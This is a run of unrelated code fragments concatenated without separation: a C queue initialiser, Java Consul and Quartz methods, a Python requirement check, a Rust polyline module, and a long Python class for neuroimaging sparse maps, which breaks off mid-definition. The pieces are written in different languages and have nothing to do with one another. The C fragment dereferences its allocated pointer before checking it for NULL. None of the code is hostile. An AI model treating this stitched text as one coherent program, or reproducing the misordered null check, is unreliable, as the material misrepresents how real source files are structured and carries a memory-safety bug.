/** * Inicia todos os recursos da fila */ extern FilaEntrada *iniciaFila() { FilaEntrada *fila; fila = (FilaEntrada *)malloc(sizeof(FilaEntrada)); fila->head = NULL; fila->tail = NULL; fila->quantidade = 0; if (pthread_mutex_init(&fila->mutex, NULL) == -1) { logMessage("FLENT", "Erro no mutex!", true); return NULL; } if (fila == NULL) { logMessage("FLENT", "Erro ao criar fila de dados!", true); return NULL; } return fila; }
/** * Performs a Consul transaction. * * PUT /v1/tx * * @deprecated Replaced by {@link #performTransaction(TransactionOptions, Operation...)} * * @param consistency The consistency to use for the transaction. * @param operations A list of KV operations. * @return A {@link ConsulResponse} containing results and potential errors. */ @Deprecated public ConsulResponse<TxResponse> performTransaction(ConsistencyMode consistency, Operation... operations) { Map<String, Object> query = consistency == ConsistencyMode.DEFAULT ? ImmutableMap.of() : ImmutableMap.of(consistency.toParam().get(), "true"); try { return http.extractConsulResponse(api.performTransaction(RequestBody.create(MediaType.parse("application/json"), Jackson.MAPPER.writeValueAsString(kv(operations))), query)); } catch (JsonProcessingException e) { throw new ConsulException(e); } }
/** * The base quartz job * * @author davitp */ public class QuartzExecutorJob implements Job { /** * Create and invoke corresponding executor by type * * @param context The execution context * @throws JobExecutionException Throws if something went wrong */ @Override public void execute(JobExecutionContext context) throws JobExecutionException { // wrap context into an abstract type var executorContext = new QuartzExecutorContext(context); // try get type var type = executorContext.getType(); // nothing to do without type if(Str.blank(type)){ throw new JobExecutionException("Type is missing"); } // try get supplier var supplier = JobOps.getExecutor(type, context); // could not find supplier, something went wrong if(supplier == null){ throw new JobExecutionException("The requested job type is not supporeted"); } // create new instance using supplier var tryInstance = Try.of(() -> supplier.apply(executorContext)); // could not create instance from supplier, almost not possible if(!tryInstance.isSuccess()){ throw new JobExecutionException("Unable to create an executor from given supplier", tryInstance.getCause()); } // could not create instance from supplier, almost not possible if(tryInstance.get() == null){ throw new JobExecutionException("Supplier of executor returned null. Cannot execute..."); } // try execute job and report otherwise try { tryInstance.get().execute(); } catch (JobExecutorException ex) { throw new JobExecutionException("Error while executing the job instance", ex); } } }
def process_requirement(self, requirement, cache=False): if requirement.is_valid: result = requirement.passes if cache: self.cache.merge(requirement.cache) return result log.debug("invalid requirement: %s - fail", self.content) return False
<filename>ncollide_procedural/polyline.rs use std::marker::PhantomData; use std::ops::{Index, IndexMut}; use na; use na::{Translate, Rotate, Transform, Dim}; use math::{Scalar, Point, Vect}; /// Shapeetric description of a polyline. #[derive(Clone)] pub struct Polyline<N, P, V> { /// Coordinates of the polyline vertices. pub coords: Vec<P>, /// Coordinates of the polyline normals. pub normals: Option<Vec<V>>, phantom: PhantomData<N> } impl<N, P, V> Polyline<N, P, V> { /// Creates a new polyline. pub fn new(coords: Vec<P>, normals: Option<Vec<V>>) -> Polyline<N, P, V> { Polyline { coords: coords, normals: normals, phantom: PhantomData } } } impl<N: Scalar, P: Point<N, V>, V: Vect<N>> Polyline<N, P, V> { /// Translates each vertex of this polyline. pub fn translate_by<T: Translate<P>>(&mut self, t: &T) { for c in self.coords.iter_mut() { *c = t.translate(c); } } /// Rotates each vertex and normal of this polyline. // XXX: we should use Rotate<P> instead of the .set_coord. // Wa cannot make it a Rotate because the `Rotate` bound cannot appear twice… we have, again, // to wait for the trait reform. pub fn rotate_by<R: Rotate<V>>(&mut self, r: &R) { for c in self.coords.iter_mut() { let rc = r.rotate(c.as_vec()); c.set_coords(rc); } for n in self.normals.iter_mut() { for n in n.iter_mut() { *n = r.rotate(n); } } } /// Transforms each vertex and rotates each normal of this polyline. pub fn transform_by<T: Transform<P> + Rotate<V>>(&mut self, t: &T) { for c in self.coords.iter_mut() { *c = t.transform(c); } for n in self.normals.iter_mut() { for n in n.iter_mut() { *n = t.rotate(n); } } } /// Scales each vertex of this polyline. pub fn scale_by_scalar(&mut self, s: &N) { for c in self.coords.iter_mut() { *c = *c * *s } // FIXME: do something for the normals? } } impl<N, P, V> Polyline<N, P, V> where N: Scalar, P: Index<usize, Output = N> + IndexMut<usize, Output = N>, V: Dim + Index<usize, Output = N> { /// Scales each vertex of this mesh. #[inline] pub fn scale_by(&mut self, s: &V) { for c in self.coords.iter_mut() { for i in 0 .. na::dim::<V>() { c[i] = (*c)[i] * s[i]; } } // FIXME: do something for the normals? } }
class Maps: """Store data of several maps and implement operations on it.""" def __init__(self, df=None, template=None, Ni=None, Nj=None, Nk=None, affine=None, mask=None, atlas=None, groupby_col=None, x_col='x', y_col='y', z_col='z', weight_col='weight', save_memory=True, verbose=None, dtype=np.float64 ): """ Args: df (pandas.DataFrame): Pandas DataFrame containing the (x,y,z) coordinates, the weights and the map id. The names of the columns can be specified. template (nibabel.Nifti1Image): Template storing the box size and affine. If not None, Will overwrite parameters Ni, Nj, Nk and affine. Ni (int): X size of the bounding box. Nj (int): Y size of the bounding box. Nk (int): Z size of the bounding box. affine (numpy.ndarray): Array with shape (4, 4) storing the affine used to compute brain voxels coordinates from world cooridnates. mask (nibabel.Nifti1Image): Nifti1Image with 0 or 1 data. 0: outside the mask, 1: inside. atlas (Object): Object containing a nibabel.Nifti1Image or a path to it in atlas['maps'] and a list of the labels in atlas['labels'] groupby_col (str): Name of the column on which the groupby operation is operated. Or in an equivalent way, the name of the column storing the ids of the maps. x_col (str): Name of the column storing the x coordinates. y_col (str): Name of the column storing the y coordinates. z_col (str): Name of the column storing the z coordinates. weight_col (str): Name of the column storing the weights. """ if template is not None and (isinstance(template, nib.Nifti1Image) or isinstance(template, str)): template = nilearn.image.load_img(template) Ni, Nj, Nk = template.shape affine = template.affine elif template is not None: raise ValueError('Template not understood.' 'Must be a nibabel.Nifti1Image or a path to it.') elif isinstance(df, np.ndarray) and len(df.shape) == 3: Ni, Nj, Nk = df.shape elif isinstance(df, np.ndarray) and len(df.shape) == 4: Ni, Nj, Nk, _ = df.shape elif isinstance(df, nib.Nifti1Image) or isinstance(df, str): pass if mask is not None and not isinstance(mask, nib.Nifti1Image): raise ValueError('Mask must be an instance of nibabel.Nifti1Image') self._save_memory = save_memory self._mask = mask self._maps = None self._atlas = Atlas(atlas) self._maps_dense = None self._maps_atlas = None self._atlas_filter_matrix = None self._dtype = dtype self.verbose = verbose if isinstance(df, pd.DataFrame): if groupby_col is None: raise TypeError('Must specify column name to group by maps.') if Ni is None or Nj is None or Nk is None or affine is None: raise TypeError('Must specify Ni, Nj, Nk and affine to' 'initialize with dataframe.') col_names = { 'groupby': groupby_col, 'x': x_col, 'y': y_col, 'z': z_col, 'weight': weight_col } self._maps = build_maps_from_df(df, col_names, Ni, Nj, Nk, affine, mask, self.verbose, self._dtype) elif isinstance(df, nib.Nifti1Image) or isinstance(df, str) or isinstance(df, list): self._maps, Ni, Nj, Nk, affine = build_maps_from_img(df, dtype=self._dtype) elif isinstance(df, np.ndarray) and len(df.shape) == 2: self._maps = scipy.sparse.csr_matrix(df, dtype=self._dtype) elif isinstance(df, np.ndarray) and len(df.shape) == 3: df = self._flatten_array(df, _2D=1) self._maps = scipy.sparse.csr_matrix(df, dtype=self._dtype) elif isinstance(df, np.ndarray) and len(df.shape) == 4: df = df.reshape((-1, df.shape[-1]), order='F') self._maps = scipy.sparse.csr_matrix(df, dtype=self._dtype) elif isinstance(df, tuple): self._maps = scipy.sparse.csr_matrix(df, dtype=self._dtype) elif isinstance(df, int): self._maps = scipy.sparse.csr_matrix((df, 1), dtype=self._dtype) elif df is None: self._maps = None elif not isinstance(df, Maps): raise TypeError(f'First argument not understood : {type(df)}') if Ni is None or Nj is None or Nk is None: raise TypeError('Must either specify Ni, Nj, Nk or template.') self._Ni = Ni self._Nj = Nj self._Nk = Nk self._affine = affine if self._mask_dimensions_missmatch(): raise ValueError(f'Mask dimensions missmatch. Given box size is ' f'({self.Ni}, {self.Nj}, {self.Nk}) whereas ' f'mask size is {self._mask.get_fdata().shape}. ' f'Consider resampling either input data or mask.') if self._atlas_dimensions_missmatch(): raise ValueError(f'Atlas dimensions missmatch. Given box size is ' f'({self.Ni}, {self.Nj}, {self.Nk}) whereas ' f'atlas size is {self._atlas.data.shape}. ' f'Consider resampling input data or atlas.') if self._box_dimensions_missmatch(): raise ValueError(f'Box dimension missmatch. Given box size is ' f'({self.Ni}, {self.Nj}, {self.Nk}) for ' f'{self.prod_N} voxels whereas maps ' f'has shape {self._maps.shape}.') if self._has_mask(): self.apply_mask(mask) self._refresh_atlas_maps() if not save_memory: self._set_dense_maps() # _____________PROPERTIES_____________ # @property def save_memory(self): return self._save_memory @save_memory.setter def save_memory(self, save_memory): self._save_memory = save_memory if save_memory: if hasattr(self, '_maps_dense'): del self._maps_dense else: self._set_dense_maps() @property def maps(self): return self._maps @maps.setter def maps(self, maps): if not scipy.sparse.issparse(maps) or maps.getformat() != 'csr': maps = scipy.sparse.csr_matrix(maps) self._maps = maps.astype(self._dtype) self._refresh_atlas_maps() if hasattr(self, '_save_memory') and not self._save_memory: self._set_dense_maps() def _set_maps(self, maps, refresh_atlas_maps=True, refresh_dense_maps=True): self._maps = maps.astype(self._dtype) if refresh_atlas_maps: self._refresh_atlas_maps() if refresh_dense_maps and hasattr(self, '_save_memory') and not self._save_memory: self._set_dense_maps() @property def n_voxels(self): # Deprecated return 0 if self._maps is None else self._maps.shape[0] @property def n_v(self): return 0 if self._maps is None else self._maps.shape[0] @property def n_maps(self): # Deprecated return 0 if self._maps is None else self._maps.shape[1] @property def n_m(self): return 0 if self._maps is None else self._maps.shape[1] @property def Ni(self): return self._Ni @property def Nj(self): return self._Nj @property def Nk(self): return self._Nk @property def prod_N(self): return self.Ni*self.Nj*self.Nk @property def affine(self): return self._affine @property def shape(self): return (self.Ni, self.Nj, self.Nk, self.n_m) @property def shape_f(self): return (self.n_v, self.n_m) def set_coord(self, id, x, y, z, val): """Set value to a given x y z coord""" if id < 0 or id >= self.n_m: raise ValueError(f'Map id must be in [0, {self.n_m}].') i, j, k = self.xyz_to_ijk(x, y, z) p = self._coord_to_id(i, j, k) self.maps[p, id] = val def xyz_to_ijk(self, x, y, z): if self.affine is None: raise ValueError('Maps object should have affine to convert xyz coords.') inv_affine = np.linalg.inv(self.affine) return np.clip(np.floor(np.dot(inv_affine, [x, y, z, 1]))[:-1].astype(int), [0, 0, 0], [self.Ni-1, self.Nj-1, self.Nk-1]) # _____________CLASS_METHODS_____________ # @classmethod def empty(cls, **kwargs): """ Create an empty Maps object. See Maps.__init__ doc for valid kwargs. Returns: (Maps) Instance of Maps object. """ return cls(df=None, **kwargs) @classmethod def zeros(cls, n_maps=1, **kwargs): """ Create zero-valued maps of the given shape. See the Maps.__init__ doc for **kwargs parameters. Args: n_maps (int, Optional): Number of maps. Returns: (Maps) Instance of Maps object. """ maps = cls.empty(**kwargs) maps.maps = csr_matrix((maps.prod_N, n_maps), dtype=maps._dtype) return maps @classmethod def random(cls, size, p=None, random_state=None, **kwargs): """ Create random maps from given size. Must give appropriates kwargs to initialize an empty map. See the Maps.__init__ doc. Args: size: See the Maps.randomize doc. p: See the Maps.randomize doc. Returns: (Maps) Instance of Maps object. """ maps = cls.empty(**kwargs) return maps.randomize( size, p=p, override_mask=False, inplace=True, random_state=random_state ) @classmethod def copy_header(cls, other): """ Create a Maps instance with same header as given Maps object. Args: other (Maps): Maps instance wanted informations. Returns: (Maps) Instance of Maps object. """ maps = cls(Ni=other._Ni, Nj=other._Nj, Nk=other._Nk) maps._copy_header(other) return maps @classmethod def concatenate(cls, seq): """ Concatenate given sequence of Maps object. For example if the first object contains 1 map and the second 2 maps, the concatenated object contains the 3 stacked maps. Args: seq (sequence): Sequence of Maps object to concatenate. Returns: (Maps) Instance of Maps object Raises: ValueError: If shapes of maps missmatch or empty sequence. """ if not seq: raise ValueError('Empty sequence given.') res = Maps.copy_header(seq[0]) res.maps = hstack([maps.maps for maps in seq]) return res # _____________PRIVATE_TOOLS_____________ # def _copy_header(self, other): self._Ni = other._Ni self._Nj = other._Nj self._Nk = other._Nk self._affine = other._affine self._mask = other._mask self._save_memory = other._save_memory self._atlas = other._atlas return self def __str__(self): return ( f'\nMaps object containing {self.n_m} maps.\n' f'____________Header_____________\n' f'N Nonzero : {self.maps.count_nonzero()}\n' f'N voxels : {self.n_v}\n' f'N maps : {self.n_m}\n' f'Box size : ({self.Ni}, {self.Nj}, {self.Nk})\n' f'Affine :\n{self.affine}\n' f'Has atlas : {self._has_atlas()}\n' f'Map : \n{self.maps}\n' f'Atlas Map : \n{self._maps_atlas}\n' ) @staticmethod def coord_to_id(i, j, k, Ni, Nj, Nk): return np.ravel_multi_index((i, j, k), (Ni, Nj, Nk), order='F') @staticmethod def id_to_coord(id, Ni, Nj, Nk): return np.unravel_index(id, (Ni, Nj, Nk), order='F') @staticmethod def flatten_array(array, _2D=None): shape = -1 if _2D is None else (-1, _2D) return array.reshape(shape, order='F') @staticmethod def unflatten_array(array, Ni, Nj, Nk, _4D=None): shape = (Ni, Nj, Nk) if _4D is None or _4D == 1 else (Ni, Nj, Nk, _4D) return array.reshape(shape, order='F') def _coord_to_id(self, i, j, k): return self.coord_to_id(i, j, k, self._Ni, self._Nj, self._Nk) def _id_to_coord(self, id): return self.id_to_coord(id, self._Ni, self._Nj, self._Nk) def _flatten_array(self, array, _2D=None): return self.flatten_array(array, _2D=_2D) def _unflatten_array(self, array, _4D=None): return self.unflatten_array(array, self._Ni, self._Nj, self._Nk, _4D=_4D) def _build_atlas_filter_matrix(self): if not self._has_atlas(): return atlas_data = self._flatten_array(self._atlas.data) filter_matrix = scipy.sparse.lil_matrix((self._atlas.n_labels, self.prod_N)) for k in range(self._atlas.n_labels): row = atlas_data == k filter_matrix[k, row] = 1/np.sum(row) return scipy.sparse.csr_matrix(filter_matrix) def _refresh_atlas_maps(self): if not self._has_atlas() or self._maps is None: return if self._atlas_filter_matrix is None: self._atlas_filter_matrix = self._build_atlas_filter_matrix() self._maps_atlas = self._atlas_filter_matrix.dot(self.maps) def _has_atlas(self): return self._atlas is not None and self._atlas.atlas is not None def _has_mask(self): return self._mask is not None and isinstance(self._mask, nib.Nifti1Image) def _get_maps(self, map_id=None, atlas=False, dense=False): if atlas and dense: raise ValueError('No dense maps for atlas.') if map_id is None: if atlas: return self._maps_atlas elif dense: return self._maps_dense else: return self._maps else: if atlas: return self._maps_atlas[:, map_id] elif dense: return self._maps_dense[:, :, :, map_id] else: return self._maps[:, map_id] def _set_dense_maps(self): if self._maps is None: self._maps_dense = None else: self._maps_dense = Maps.unflatten_array(self._maps.toarray(), self._Ni, self._Nj, self._Nk, _4D=self.n_maps) def _box_dimensions_missmatch(self): Ni, Nj, Nk = self._Ni, self._Nj, self._Nk if self._maps is None: return False if Ni is not None and Nj is not None and Nk is not None and self._maps is not None and Ni*Nj*Nk == self._maps.shape[0]: return False return True def _mask_dimensions_missmatch(self): if not self._has_mask(): return False if (self._Ni, self._Nj, self._Nk) == self._mask.shape: return False return True def _atlas_dimensions_missmatch(self): if not self._has_atlas(): return False if (self._Ni, self._Nj, self._Nk) == self._atlas.data.shape: return False return True def _should_verbose(self, verbose): if verbose is None: if self.verbose is None: return False return self.verbose return verbose # _____________OPERATORS_____________ # def __iadd__(self, val): self.maps += val.maps return self def __add__(self, other): result = copy.copy(self) result += other return result def __imul__(self, val): self.maps *= val return self def __mul__(self, val): result = copy.copy(self) result *= val return result def __rmul__(self, val): return self.__mul__(val) def __getitem__(self, key): return self.maps[:, key] # _____________DATA_TRANSFORMERS_____________ # @staticmethod def map_to_array(map, Ni, Nj, Nk): ''' Convert a sparse matrix of shape (n_voxels, 1) into a dense 3D numpy array of shape (Ni, Nj, Nk). Indexing of map is supposed to have been made Fortran like (first index moving fastest). ''' n_v, n_maps = map.shape if n_v != Ni*Nj*Nk: raise ValueError(f'Map\'s length ({n_v}) does not match given box ' f'({Ni}, {Nj}, {Nk}) of size {Ni*Nj*Nk}.') return Maps.unflatten_array(map.toarray(), Ni, Nj, Nk, _4D=n_maps) @staticmethod def array_to_map(array): return scipy.sparse.csr_matrix(Maps.flatten_array(array, _2D=1)) @staticmethod def array_to_img(array, affine): ''' Convert a dense 3D array into a nibabel Nifti1Image. ''' return nib.Nifti1Image(array, affine) @staticmethod def map_to_img(map, Ni, Nj, Nk, affine): ''' Convert a sparse matrix of shape (n_voxels, 1) into a nibabel Nifti1Image. Ni, Nj, Nk are the size of the box used to index the flattened map matrix. ''' return Maps.array_to_img(Maps.map_to_array(map, Ni, Nj, Nk), affine) def to_array(self, map_id=None): ''' Convert one map into a 3D numpy.ndarray. Args: map_id (int, optional): If int : id of the map to convert (3D output). If None, converts all the maps (4D output). Defaults to None. Returns: (numpy.ndarray) 3D array containing the chosen map information. ''' maps = self._maps if map_id is not None: maps = self._maps[:, map_id] return self.map_to_array(maps, self._Ni, self._Nj, self._Nk) def to_img(self, map_id=None, sequence=False, verbose=None): ''' Convert one map into a nibabel.Nifti1Image. Args: map_id (int, optional): If int : id of the map to convert (3D output). If None, converts all the maps (4D output). Defaults to None. Returns: (nibabel.Nifti1Image) Nifti1Image containing the chosen map information. ''' if self._affine is None: raise ValueError('Must specify affine to convert maps to img.') verbose = self._should_verbose(verbose) maps = self._maps if map_id is not None: maps = self._maps[:, map_id] if sequence: n_jobs = multiprocessing.cpu_count()//2 splitted_range = np.array_split(range(maps.shape[1]), n_jobs) def to_img_pool(maps_range): res = [] n_tot = len(maps_range) for i, k in enumerate(maps_range): print_percent(i, n_tot, string='Converting {1} out of {2}... {0:.2f}%', verbose=verbose, rate=0, prefix='Maps') res.append(self.map_to_img(maps[:, k], self._Ni, self._Nj, self._Nk, self._affine)) return res return np.concatenate(Parallel(n_jobs=n_jobs, backend='threading')(delayed(to_img_pool)(sub_array) for sub_array in splitted_range)) return self.map_to_img(maps, self._Ni, self._Nj, self._Nk, self._affine) @staticmethod def _one_map_to_array_atlas(map, Ni, Nj, Nk, atlas_data, label_range): array = np.zeros((Ni, Nj, Nk)) for k in label_range: array[atlas_data == k] = map[k, 0] return array def to_array_atlas(self, map_id=None, ignore_bg=True, bg_label=None): ''' Convert one atlas map into a 3D numpy.array. Args: map_id (int, optional): If int : id of the map to convert (3D output). If None, converts all the maps (4D output). Defaults to None. ignore_bg (bool, optional): If True: ignore the first label of the atlas (background) which is set to 0 in the returned array. Returns: (numpy.ndarray) 3D array containing the chosen atlas map information. Raises: AttributeError: If no atlas has been given to this instance. ''' if not self._has_atlas(): raise AttributeError('No atlas were given.') # start = 1 if ignore_bg else 0 # label_range = range(start, self._atlas.n_labels) # label_range = self._atlas.labels_range_without_bg if ignore_bg and self._atlas.has_background() else self._atlas.label_range label_range = self._atlas.get_labels_range(ignore_bg=ignore_bg, bg_label=bg_label) # label_range = list(range(self._atlas.n_labels)) # Delete background if any # try: # background_index = self._atlas.labels.index(background_label) # del label_range[background_index] # except ValueError: # no Background in labels # pass if map_id is None and self.n_maps == 1: map_id = 0 if map_id is None: array = np.zeros((self._Ni, self._Nj, self._Nk, self.n_maps)) for k in range(self.n_maps): array[:, :, :, k] = self._one_map_to_array_atlas(self._maps_atlas[:, k], self._Ni, self._Nj, self._Nk, self._atlas.data, label_range) else: array = np.zeros((self._Ni, self._Nj, self._Nk)) array[:, :, :] = self._one_map_to_array_atlas(self._maps_atlas[:, map_id], self._Ni, self._Nj, self._Nk, self._atlas.data, label_range) return array def to_img_atlas(self, map_id=None, ignore_bg=False): ''' Convert one atlas map into a nibabel.Nifti1Image. Args: map_id (int, optional): If int : id of the map to convert (3D output). If None, converts all the maps (4D output). Defaults to None. ignore_bg (bool, optional): If True: ignore the first label of the atlas (background) which is set to 0 in the returned array. Returns: (nibabel.Nifti1Image) Nifti1Image containing the chosen atlas map information. Raises: AttributeError: If no atlas as been given to this instance. ''' return self.array_to_img(self.to_array_atlas(map_id=map_id, ignore_bg=ignore_bg), self._affine) def _to_map_atlas(self, data): if isinstance(data, np.ndarray): data = scipy.sparse.csr_matrix(self.flatten_array(data, _2D=1)) return self._atlas_filter_matrix.dot(data) def to_atlas(self, bg_label=None): ''' Converts the maps into an atlas by creating a label for each different values. Returns: (nibabel.Nifti1Image) Nifti1Image containing the atlas () Labels of the regions ''' array = self.to_array() # print(np.histogram(array)) # print(np.unique(array)) # uniques = np.unique(array) # n_tot = len(uniques) if len(array.shape) == 4: array = np.concatenate((np.zeros(array.shape[:-1]+(1,)), array), axis=3) array = np.argmax(array, axis=3) # array_atlas = np.zeros(array.shape[:-1]) # # print(np.histogram(np.argmax(array, axis=3))) # for k in range(self.n_maps): # print_percent(k, self.n_maps, string='Converting to atlas label {1} out of {2} : {0:.2f}%...', rate=0, verbose=verbose) # array_atlas[array[:, :, :, k] > 0] = k+1 if self.n_maps == 1: # Atlas stored on one map # n_labels = len(np.unique(self.to_array(0))) n_labels = int(np.max(self.to_array(0)))+1 else: # Atlas stored on several maps, one label on each n_labels = self.n_maps if bg_label is not None: if not isinstance(bg_label, tuple) or not len(bg_label) == 2: raise ValueError('Background label must be a length 2 tuple of shape (bg_label_id, bg_label_name).') bg_label_id, bg_label_name = bg_label if bg_label_id < 0 or bg_label_id >= n_labels: raise ValueError('Given background index out of range. {0} labels detected.'.format(n_labels)) L1 = ['r{}'.format(k) for k in range(bg_label_id)] L2 = [bg_label_name] L3 = ['r{}'.format(k) for k in range(bg_label_id+1, n_labels)] L = L1+L2+L3 else: L = ['r{}'.format(k) for k in range(n_labels)] return {'maps': nib.Nifti1Image(array, self._affine), 'labels': L} # _____________PUBLIC_TOOLS_____________ # def apply_mask(self, mask): ''' Set the contribution of every voxels outside the mask to zero. Args: mask (nibabel.Nifti1Image): Nifti1Image with 0 or 1 array. 0: outside the mask, 1: inside. ''' if not isinstance(mask, nib.Nifti1Image): raise ValueError('Mask must be an instance of nibabel.Nifti1Image') if self.maps is not None: mask_array = self._flatten_array(mask.get_fdata()).astype(self._dtype) filter_matrix = scipy.sparse.diags(mask_array, format='csr').astype(self._dtype) self.maps = filter_matrix.dot(self.maps) self._mask = mask def apply_atlas(self, atlas, inplace=False): new_maps = self if inplace else copy.copy(self) new_maps._atlas = Atlas(atlas) new_maps._atlas_filter_matrix = new_maps._build_atlas_filter_matrix() new_maps._refresh_atlas_maps() return new_maps def randomize(self, size, p=None, override_mask=False, inplace=False, random_state=None ): """ Randomize maps from based on given size. Args: size: int or size 2 tuple or 1D numpy.ndarray. If 1D numpy.ndarray, creates as many maps as the array length and sample the given number of peaks in each maps. Each peak has a weight 1 and the weights of the peaks sampled on the same voxel of the same map are added. If tuple (n_peaks, n_maps) given, creates n_maps, samples n_peaks and assign each peak to a map uniformly. If int given, equivalent as tuple with n_maps=1. p (Maps instance or np.ndarray): (Optional) Distribution of probability of the peaks over the voxels. The distribution may be given either by a Maps instance containing 1 map or a np.ndarray of same shape as the box of the current Maps instance (Ni, Nj, Nk). If None, sample uniformly accros the box. Default: None override_mask (bool): (Optional) If False, use the mask given when initializing the Maps object. Important : the given distribution p is then shrinked and re-normalized. If True, no mask is used and p is unchanged. Default : False. inplace (bool): (Optional) Performs the sampling inplace (True) or creates a new instance (False). Default False. Returns: (Maps instance) Self or a copy depending on inplace. """ np.random.seed(random_state) if self._Ni is None or self._Nj is None or self._Nk is None: raise ValueError('Invalid box size ({}, {}, {}).'.format(self._Ni, self._Nj, self._Nk)) if isinstance(size, int): n_peaks, n_maps = size, 1 elif isinstance(size, tuple): if len(size) != 2: raise ValueError('If given size is a tuple, must be of size 2 : (n_peaks, n_maps).') n_peaks, n_maps = size elif isinstance(size, np.ndarray): if len(size.shape) != 1: raise ValueError('Given size array not understood. Must be a 1D numpy array.') n_peaks, n_maps = np.sum(size), size.shape[0] else: raise ValueError('Given size not understood.') n_voxels = self._Ni*self._Nj*self._Nk if p is None: p = np.ones(n_voxels)/n_voxels elif isinstance(p, Maps): if p.n_maps != 1: raise ValueError('Maps object should contain exactly one map to serve as distribution. Given has {} maps.'.format(p.n_maps)) p = p.maps.transpose().toarray()[0] elif isinstance(p, np.ndarray): if p.shape != (self._Ni, self._Nj, self._Nk): raise ValueError('Invalid numpy array to serve as a distribution. Should be of shape ({}, {}, {}).'.format(self._Ni, self._Nj, self._Nk)) p = self._flatten_array(p) else: raise ValueError('Invalid distribution p. Must be either None, Maps object or numpy.ndarray.') if not override_mask and self._has_mask(): mask = self._flatten_array(self._mask.get_fdata()) p = np.ma.masked_array(p, np.logical_not(mask)).filled(0) p /= np.sum(p) maps = scipy.sparse.dok_matrix((n_voxels, n_maps)) voxels_samples = np.random.choice(n_voxels, size=n_peaks, p=p) if isinstance(size, np.ndarray): maps_samples = np.repeat(np.arange(n_maps), repeats=size) else: maps_samples = np.random.choice(n_maps, size=n_peaks) for i in range(n_peaks): map_id = maps_samples[i] maps[voxels_samples[i], map_id] += 1 maps = scipy.sparse.csr_matrix(maps) new_maps = self if inplace else copy.copy(self) new_maps.maps = maps return new_maps def normalize(self, inplace=False): ''' Normalize each maps separatly so that each maps sums to 1. Args: inplace (bool, optional): If True performs the normalization inplace else create a new instance. Returns: (Maps) Self or a copy depending on inplace. ''' diag = scipy.sparse.diags(np.power(self.n_peaks(atlas=False), -1)) new_maps = self if inplace else copy.copy(self) new_maps.maps = self._maps.dot(diag) if self._has_atlas(): diag_atlas = scipy.sparse.diags(np.power(self.n_peaks(atlas=True), -1)) new_maps._maps_atlas = self._maps_atlas.dot(diag_atlas) return new_maps def threshold(self, threshold, inplace=False): ''' Threshold each map according to the given threshold. Args: threshold: All value greater or equal to threshold remains unchanged, all the others are set to zero. inplace (bool, optional): If True performs the normalization inplace else create a new instance. Returns: (Maps) Self or a copy depending on inplace. ''' new_maps = self if inplace else copy.copy(self) new_maps.maps[new_maps.maps < threshold] = 0. return new_maps @staticmethod def _smooth_array(array, sigma): return gaussian_filter(array, sigma=sigma) @staticmethod def _smooth_map(map, sigma, Ni, Nj, Nk): array = Maps.map_to_array(map, Ni, Nj, Nk) array = Maps._smooth_array(array, sigma=sigma) map = Maps.array_to_map(array) return map @staticmethod def _smooth(data, sigma, Ni=None, Nj=None, Nk=None): if sigma is None: return data if isinstance(data, np.ndarray): return Maps._smooth_array(data, sigma) elif scipy.sparse.issparse(data): return Maps._smooth_map(data, sigma, Ni, Nj, Nk) def smooth(self, sigma, map_id=None, inplace=False, verbose=None): ''' Convolve chosen maps with gaussian kernel. Args: sigma (float): Standard deviation of the gaussian kernel. map_id (int, optional): If None: convolves each maps. If int: convolves only the chosen map. Defaults to None. inplace (bool, optional): If True performs the normalization inplace else create a new instance. Defaults to False verbose (bool, optional): If True print logs. ''' verbose = self._should_verbose(verbose) if map_id is None: map_ids = range(self.n_maps) else: map_ids = [map_id] def smooth_pool(map_ids, self, sigma): csc_matrices = [] n_tot = len(map_ids) count = 0 for k in map_ids: print_percent(count, n_tot, 'Smoothing {1} out of {2}... {0:.1f}%', rate=0, verbose=verbose, prefix='Maps') count += 1 if not self.save_memory: array = self._get_maps(map_id=k, dense=True) else: array = self.to_array(k) array_smoothed = gaussian_filter(array, sigma=sigma) array_smoothed = self._flatten_array(array_smoothed, _2D=1) matrix = scipy.sparse.csc_matrix(array_smoothed) csc_matrices.append(matrix) return csc_matrices nb_jobs = multiprocessing.cpu_count()//2 splitted_range = np.array_split(map_ids, nb_jobs) csc_matrices = np.concatenate(Parallel(n_jobs=nb_jobs, backend='threading')(delayed(smooth_pool)(sub_array, self, sigma) for sub_array in splitted_range)) csr_maps = scipy.sparse.hstack(csc_matrices) csr_maps = scipy.sparse.csr_matrix(csr_maps) new_maps = self if inplace else copy.copy(self) new_maps.maps = csr_maps return new_maps def split(self, prop=0.5, random_state=None): """ Split maps randomly based on the given proportion. Args: prop(float): proportion of maps to assign in first set. random_state(int): seed to initialise numpy.random.seed. Returns: (tuple): Size 2 tuple of Maps object. The first contains approximatively the given proportion of the total maps. """ np.random.seed(random_state) maps_A = Maps.copy_header(self) maps_B = Maps.copy_header(self) n_A = np.ceil(prop*self.n_maps).astype(int) # Nb elements in subset A omega = np.arange(self.n_maps) id_sub_maps_A = np.sort(np.random.choice(omega, n_A, replace=False)) id_sub_maps_B = np.sort(np.delete(omega, id_sub_maps_A)) def filter_matrix(array): M = scipy.sparse.lil_matrix((self.n_maps, array.shape[0])) for k in range(array.shape[0]): M[array[k], k] = 1 return scipy.sparse.csr_matrix(M) filter_matrix_A = filter_matrix(id_sub_maps_A) filter_matrix_B = filter_matrix(id_sub_maps_B) maps_A.maps = self.maps.dot(filter_matrix_A) maps_B.maps = self.maps.dot(filter_matrix_B) return maps_A, maps_B def shuffle(self, random_state=None, inplace=False): """Shuffle the maps index. Shuffle the maps index. For example, if 3 maps are stored in this order (1, 2, 3), shuffling them may lead to a new order (2, 1, 3). Arguments: random_state {int} -- Used to initialize the numpy random seed. """ np.random.seed(random_state) new_maps = self if inplace else copy.copy(self) permutation = np.random.permutation(new_maps.n_m) M = scipy.sparse.lil_matrix((new_maps.n_m, new_maps.n_m)) for k in range(new_maps.n_m): M[k, permutation[k]] = 1. M = scipy.sparse.csr_matrix(M) new_maps.maps = new_maps.maps.dot(M) return new_maps # _____________STATISTICS_____________ # def n_peaks(self, atlas=False): ''' Compute the sum of weights in each maps (equivalent to number of peaks if unit weights are 1). Args: atlas (bool, optional): If True, the atlas maps are considered. ''' return self.sum(atlas=atlas, axis=0, keepdims=True).reshape(-1) def max(self, atlas=False, **kwargs): ''' Compute the maximum. axis=None: element-wise, axis=0: maps-wise, axis=1: voxels/labels-wise. Args: atlas (bool, optional): If True, the atlas maps are considered. **kwargs: Kwargs are passed to scipy.sparse.csr_matrix.max() function. Returns: (numpy.ndarray) 2D numpy array ''' maps = self._get_maps(atlas=atlas) max = copy.copy(maps).max(**kwargs) if isinstance(max, scipy.sparse.coo.coo_matrix): max = max.toarray() return max def sum(self, atlas=False, axis=None, keepdims=False): 